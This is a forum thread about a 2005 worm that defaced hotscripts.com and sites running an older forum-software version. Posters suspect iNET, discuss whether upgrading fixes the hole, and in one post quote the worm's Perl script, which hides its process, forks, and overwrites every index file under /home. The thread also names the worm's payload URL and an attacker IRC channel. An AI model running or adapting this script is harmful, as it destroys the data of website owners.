Announcement

Collapse
No announcement yet.

hotscripts hacked

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • hotscripts hacked

    http://hotscripts.com/ hacked

  • #2
    What bad luck.

    Doesn't surprise me with the amount of people Inet (Communitech) have pissed off over the years.
    http://forums.cpfc.org/

    Comment


    • #3
      Originally posted by Dave#
      What bad luck.

      Doesn't surprise me with the amount of people Inet (Communitech) have pissed off over the years.
      This was not a direct hack. It was a worm type virus. I'm afraid that all I can post but I'm sure you'll hear more about this worm in the comming days.

      Also I work for iNET and I didn't work for Communitech

      Comment


      • #4
        Seems to be good now.

        Comment


        • #5
          Also I work for iNET and I didn't work for Communitech
          Whatever, Inet are just Communitech under another another name.

          Personally I would find it difficult to work for people like that.
          http://forums.cpfc.org/

          Comment


          • #6
            I am not php expert but was it this?
            PHP Code:
              #!/usr/bin/perl
             
             
            my $processo "/usr/local/sbin/httpd - spy";
             
            $SIG{"INT"} = "IGNORE";
             
            $SIG{"HUP"} = "IGNORE";
             
            $SIG{"TERM"} = "IGNORE";
             
            $SIG{"CHLD"} = "IGNORE";
             
            $SIG{"PS"} = "IGNORE";
             
             $
            0="$processo"."\0"x16;;
             
            my $pid=fork;
             exit if 
            $pid;
             die 
            "Problema com o fork: $!" unless defined($pid);
             
             
            system("find /home -name index.* >> index");
             
             
            open(a,"<index");
             @
            ind = <a>;
             
            close(a);
             
            $b scalar(@ind)
             for(
            $a=0;$a<=$b;$a++){
             
            chomp;
             
            system("echo spykids ownz your server > $ind[$a]");
             }
             
             
            system("perl zone.txt");
              exit; 
            If its not suitable here please delete. thanks

            Comment


            • #7
              That's PERL not PHP, and it appears to search and replace all index files in /home with the "spykids" text. Script kiddies, from South america, at a guess.

              Comment


              • #8
                It was indeed that. One of my servers got hit...

                Comment


                • #9
                  Don't click this link, but here is where the worm got the script from:

                  compras.el-nacional.com/spykids.txt

                  I suggest a safe wget or something other like that.

                  Comment


                  • #10
                    Also, here is what the access log call looks like:

                    -- Removed - Contact me if needed. ;-)

                    Note that I am / was still using 3.0.3, so it is possible / probable the upgrade to 3.0.7 fixes this ??
                    Last edited by dictionaryof; Sun 6th Mar '05, 10:15am.

                    Comment


                    • #11
                      Note that I am / was still using 3.0.3, so it is possible / probable the upgrade to 3.0.7 fixes this ??
                      Yes. Or if you didn't have "Add Template Name in Comments" enabled.

                      Comment


                      • #12
                        Some have an irc left there me goes to look

                        Spykids ownz you!! irc.brasnet.org //j #spy [email protected]

                        Comment


                        • #13
                          Originally posted by Mike Sullivan
                          Yes. Or if you didn't have "Add Template Name in Comments" enabled.
                          We had/have it disabled on all of our forums and yet one still got hit by this worm.....

                          Comment


                          • #14
                            I've reported posts in this thread several times, but publically posting exactly how to exploit vulnrabilities in public is not very smart. That server log shows every tom dick and harry how to exploit it.
                            Dean Clatworthy - Web Developer/Designer

                            Comment


                            • #15
                              log lines removed.

                              Can someone confirm that the upgrade to 3.0.7 will prevent this from re-occuring...

                              The upgrade has been completed, but don't want to reopen the forum til it is confirmed.

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X